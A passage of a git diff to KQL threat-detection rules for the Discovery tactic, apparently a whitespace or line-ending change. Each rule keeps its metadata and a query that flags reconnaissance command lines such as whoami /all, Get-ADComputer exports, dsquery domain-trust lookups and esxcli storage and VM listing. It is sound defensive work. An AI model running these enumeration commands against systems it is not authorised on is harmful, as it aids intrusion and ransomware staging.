-// Tags: attack.discovery, attack.t1083
-
-DeviceProcessEvents
+// Title: Capabilities Discovery - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: low
+// Description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -r " or ProcessCommandLine contains " /r " or ProcessCommandLine contains " –r " or ProcessCommandLine contains " —r " or ProcessCommandLine contains " ―r ") and FolderPath endswith "/getcap"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql b/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
index c7b93053..04dd2819 100644
--- a/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
+++ b/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
@@ -1,12 +1,12 @@
-// Title: Computer Discovery And Export Via Get-ADComputer Cmdlet
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-11-10
-// Level: medium
-// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1033
-// False Positives:
-// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
-
-DeviceProcessEvents
+// Title: Computer Discovery And Export Via Get-ADComputer Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-10
+// Level: medium
+// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033
+// False Positives:
+// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADComputer " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql b/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql
index 76de5d85..9658071a 100644
--- a/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql
@@ -1,10 +1,10 @@
-// Title: Computer System Reconnaissance Via Wmic.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-08
-// Level: medium
-// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.execution, attack.t1047
-
-DeviceProcessEvents
+// Title: Computer System Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-08
+// Level: medium
+// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1047
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql b/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql
index 25950e0e..5a6c2531 100644
--- a/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql
+++ b/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql
@@ -1,13 +1,13 @@
-// Title: Console CodePage Lookup Via CHCP
-// Author: _pete_0, TheDFIRReport
-// Date: 2022-02-21
-// Level: medium
-// Description: Detects use of chcp to look up the system locale value as part of host discovery
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1614.001
-// False Positives:
-// - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.
-// - Discord was seen using chcp to look up code pages
-
-DeviceProcessEvents
+// Title: Console CodePage Lookup Via CHCP
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-02-21
+// Level: medium
+// Description: Detects use of chcp to look up the system locale value as part of host discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1614.001
+// False Positives:
+// - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.
+// - Discord was seen using chcp to look up code pages
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith "chcp" or ProcessCommandLine endswith "chcp " or ProcessCommandLine endswith "chcp ") and FolderPath endswith "\\chcp.com" and (InitiatingProcessCommandLine contains " -c " or InitiatingProcessCommandLine contains " /c " or InitiatingProcessCommandLine contains " –c " or InitiatingProcessCommandLine contains " —c " or InitiatingProcessCommandLine contains " ―c " or InitiatingProcessCommandLine contains " -r " or InitiatingProcessCommandLine contains " /r " or InitiatingProcessCommandLine contains " –r " or InitiatingProcessCommandLine contains " —r " or InitiatingProcessCommandLine contains " ―r " or InitiatingProcessCommandLine contains " -k " or InitiatingProcessCommandLine contains " /k " or InitiatingProcessCommandLine contains " –k " or InitiatingProcessCommandLine contains " —k " or InitiatingProcessCommandLine contains " ―k ") and InitiatingProcessFolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql b/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql
index 3a44de69..450e7d9c 100644
--- a/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql
+++ b/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql
@@ -1,13 +1,13 @@
-// Title: Container Residence Discovery Via Proc Virtual FS
-// Author: Seth Hanford
-// Date: 2023-08-23
-// Level: low
-// Description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-// False Positives:
-// - Legitimate system administrator usage of these commands
-// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
-
-DeviceProcessEvents
+// Title: Container Residence Discovery Via Proc Virtual FS
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate system administrator usage of these commands
+// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents
 | where (FolderPath endswith "awk" or FolderPath endswith "/cat" or FolderPath endswith "grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nl" or FolderPath endswith "/tail") and (ProcessCommandLine contains "/proc/2/" or (ProcessCommandLine contains "/proc/" and (ProcessCommandLine endswith "/cgroup" or ProcessCommandLine endswith "/sched")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/crontab_enumeration.kql b/KQL/rules/Discovery/crontab_enumeration.kql
index 5aa3bfde..a5d0476b 100644
--- a/KQL/rules/Discovery/crontab_enumeration.kql
+++ b/KQL/rules/Discovery/crontab_enumeration.kql
@@ -1,12 +1,12 @@
-// Title: Crontab Enumeration
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-06-02
-// Level: low
-// Description: Detects usage of crontab to list the tasks of the user
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1007
-// False Positives:
-// - Legitimate use of crontab
-
-DeviceProcessEvents
+// Title: Crontab Enumeration
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects usage of crontab to list the tasks of the user
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007
+// False Positives:
+// - Legitimate use of crontab
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -l" and FolderPath endswith "/crontab"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/detected_windows_software_discovery.kql b/KQL/rules/Discovery/detected_windows_software_discovery.kql
index 5b796643..7ddb7276 100644
--- a/KQL/rules/Discovery/detected_windows_software_discovery.kql
+++ b/KQL/rules/Discovery/detected_windows_software_discovery.kql
@@ -1,12 +1,12 @@
-// Title: Detected Windows Software Discovery
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020-10-16
-// Level: medium
-// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1518
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Detected Windows Software Discovery
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-16
+// Level: medium
+// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "query" and ProcessCommandLine contains "\\software\\" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "svcversion") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/dirlister_execution.kql b/KQL/rules/Discovery/dirlister_execution.kql
index db43c8f5..4129cbf9 100644
--- a/KQL/rules/Discovery/dirlister_execution.kql
+++ b/KQL/rules/Discovery/dirlister_execution.kql
@@ -1,12 +1,12 @@
-// Title: DirLister Execution
-// Author: frack113
-// Date: 2022-08-20
-// Level: low
-// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-// False Positives:
-// - Legitimate use by users
-
-DeviceProcessEvents
+// Title: DirLister Execution
+// Author: frack113
+// Date: 2022-08-20
+// Level: low
+// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+// - Legitimate use by users
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\dirlister.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/discovery_of_a_system_time.kql b/KQL/rules/Discovery/discovery_of_a_system_time.kql
index f7f0f43d..6507ec7c 100644
--- a/KQL/rules/Discovery/discovery_of_a_system_time.kql
+++ b/KQL/rules/Discovery/discovery_of_a_system_time.kql
@@ -1,12 +1,12 @@
-// Title: Discovery of a System Time
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019-10-24
-// Level: low
-// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1124
-// False Positives:
-// - Legitimate use of the system utilities to discover system time for legitimate reason
-
-DeviceProcessEvents
+// Title: Discovery of a System Time
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: low
+// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1124
+// False Positives:
+// - Legitimate use of the system utilities to discover system time for legitimate reason
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "time" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "tz" and FolderPath endswith "\\w32tm.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql b/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql
index 7b0c1a73..e69d3819 100644
--- a/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql
+++ b/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql
@@ -1,13 +1,13 @@
-// Title: Docker Container Discovery Via Dockerenv Listing
-// Author: Seth Hanford
-// Date: 2023-08-23
-// Level: low
-// Description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-// False Positives:
-// - Legitimate system administrator usage of these commands
-// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
-
-DeviceProcessEvents
+// Title: Docker Container Discovery Via Dockerenv Listing
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate system administrator usage of these commands
+// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents
 | where ProcessCommandLine endswith ".dockerenv" and (FolderPath endswith "/cat" or FolderPath endswith "/dir" or FolderPath endswith "/find" or FolderPath endswith "/ls" or FolderPath endswith "/stat" or FolderPath endswith "/test" or FolderPath endswith "grep")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql b/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql
index ca6a57b8..e0fdf059 100644
--- a/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql
+++ b/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql
@@ -1,12 +1,12 @@
-// Title: Domain Trust Discovery Via Dsquery
-// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72
-// Date: 2019-10-24
-// Level: medium
-// Description: Detects execution of "dsquery.exe" for domain trust discovery
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1482
-// False Positives:
-// - Legitimate use of the utilities by legitimate user for legitimate reason
-
-DeviceProcessEvents
+// Title: Domain Trust Discovery Via Dsquery
+// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects execution of "dsquery.exe" for domain trust discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1482
+// False Positives:
+// - Legitimate use of the utilities by legitimate user for legitimate reason
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "trustedDomain" and (FolderPath endswith "\\dsquery.exe" or ProcessVersionInfoOriginalFileName =~ "dsquery.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/driverquery_exe_execution.kql b/KQL/rules/Discovery/driverquery_exe_execution.kql
index 7b80e2e6..30e251e4 100644
--- a/KQL/rules/Discovery/driverquery_exe_execution.kql
+++ b/KQL/rules/Discovery/driverquery_exe_execution.kql
@@ -1,12 +1,12 @@
-// Title: DriverQuery.EXE Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-19
-// Level: medium
-// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers
-// MITRE Tactic: Discovery
-// Tags: attack.discovery
-// False Positives:
-// - Legitimate use by third party tools in order to investigate installed drivers
-
-DeviceProcessEvents
+// Title: DriverQuery.EXE Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-19
+// Level: medium
+// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+// False Positives:
+// - Legitimate use by third party tools in order to investigate installed drivers
+
+DeviceProcessEvents
 | where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and (not(((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql b/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql
index c1fbed8e..f9ae9080 100644
--- a/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql
+++ b/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql
@@ -1,10 +1,10 @@
-// Title: Enumerate All Information With Whoami.EXE
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-12-04
-// Level: medium
-// Description: Detects the execution of "whoami.exe" with the "/all" flag
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-
-DeviceProcessEvents
+// Title: Enumerate All Information With Whoami.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-04
+// Level: medium
+// Description: Detects the execution of "whoami.exe" with the "/all" flag
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -all" or ProcessCommandLine contains " /all" or ProcessCommandLine contains " –all" or ProcessCommandLine contains " —all" or ProcessCommandLine contains " ―all") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql
index 7ad955ff..69d9da04 100644
--- a/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql
+++ b/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql
@@ -1,12 +1,12 @@
-// Title: ESXi Network Configuration Discovery Via ESXCLI
-// Author: Cedric Maurugeon
-// Date: 2023-09-04
-// Level: medium
-// Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: ESXi Network Configuration Discovery Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "network" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql
index 0a0a16b8..c4ad39af 100644
--- a/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql
+++ b/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql
@@ -1,12 +1,12 @@
-// Title: ESXi Storage Information Discovery Via ESXCLI
-// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
-// Date: 2023-09-04
-// Level: medium
-// Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: ESXi Storage Information Discovery Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "storage" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql
index c1e30e5f..a65b97ae 100644
--- a/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql
+++ b/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql
@@ -1,12 +1,12 @@
-// Title: ESXi System Information Discovery Via ESXCLI
-// Author: Cedric Maurugeon
-// Date: 2023-09-04
-// Level: medium
-// Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: ESXi System Information Discovery Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "system" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql
index b5c6d21d..3d941723 100644
--- a/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql
+++ b/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql
@@ -1,12 +1,12 @@
-// Title: ESXi VM List Discovery Via ESXCLI
-// Author: Cedric Maurugeon
-// Date: 2023-09-04
-// Level: medium
-// Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: ESXi VM List Discovery Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "vm process" and ProcessCommandLine endswith " list" and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql
index 6c395381..ee53f7c0 100644
--- a/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql
+++ b/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql
@@ -1,12 +1,12 @@
-// Title: ESXi VSAN Information Discovery Via ESXCLI
-// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
-// Date: 2023-09-04
-// Level: medium
-// Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: ESXi VSAN Information Discovery Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "vsan" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql
index b549c73f..4877e734 100644
--- a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql
+++ b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql
@@ -1,12 +1,12 @@
-// Title: File and Directory Discovery - Linux
-// Author: Daniil Yugoslavskiy, oscd.community, CheraghiMilad
-// Date: 2020-10-19
-// Level: informational
-// Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-// False Positives:
-// - Legitimate activities
-
-DeviceProcessEvents
+// Title: File and Directory Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community, CheraghiMilad
+// Date: 2020-10-19
+// Level: informational
+// Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine matches regex "(.){200,}" and FolderPath endswith "/file") or FolderPath endswith "/find" or FolderPath endswith "/findmnt" or FolderPath endswith "/mlocate" or (ProcessCommandLine contains "-R" and FolderPath endswith "/ls") or FolderPath endswith "/tree"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/file_and_directory_discovery_macos.kql b/KQL/rules/Discovery/file_and_directory_discovery_macos.kql
index 86fe2a14..05454ab1 100644
--- a/KQL/rules/Discovery/file_and_directory_discovery_macos.kql
+++ b/KQL/rules/Discovery/file_and_directory_discovery_macos.kql
@@ -1,12 +1,12 @@
-// Title: File and Directory Discovery - MacOS
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2020-10-19
-// Level: informational
-// Description: Detects usage of system utilities to discover files and directories
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-// False Positives:
-// - Legitimate activities
-
-DeviceProcessEvents
+// Title: File and Directory Discovery - MacOS
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: informational
+// Description: Detects usage of system utilities to discover files and directories
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine matches regex "(.){200,}" and FolderPath =~ "/usr/bin/file") or FolderPath =~ "/usr/bin/find" or FolderPath =~ "/usr/bin/mdfind" or (ProcessCommandLine contains "-R" and FolderPath =~ "/bin/ls") or FolderPath =~ "/tree"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql
index a23b223f..a359dd25 100644
--- a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql
+++ b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql
@@ -1,12 +1,12 @@
-// Title: File And SubFolder Enumeration Via Dir Command
-// Author: frack113
-// Date: 2021-12-13
-// Level: low
-// Description: Detects usage of the "dir" command part of Windows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1217
-// False Positives:
-// - Likely
-
-DeviceProcessEvents
+// Title: File And SubFolder Enumeration Via Dir Command
+// Author: frack113
+// Date: 2021-12-13
+// Level: low
+// Description: Detects usage of the "dir" command part of Windows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1217
+// False Positives:
+// - Likely
+
+DeviceProcessEvents
 | where (ProcessCommandLine =~ "*dir*-s*" or ProcessCommandLine =~ "*dir*/s*" or ProcessCommandLine =~ "*dir*–s*" or ProcessCommandLine =~ "*dir*—s*" or ProcessCommandLine =~ "*dir*―s*") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
index 2d05a0d3..557b39cc 100644
--- a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
+++ b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
@@ -1,10 +1,10 @@
-// Title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell
-// Author: @Kostastsale
-// Date: 2022-12-22
-// Level: high
-// Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1135
-
-DeviceProcessEvents
+// Title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell
+// Author: @Kostastsale
+// Date: 2022-12-22
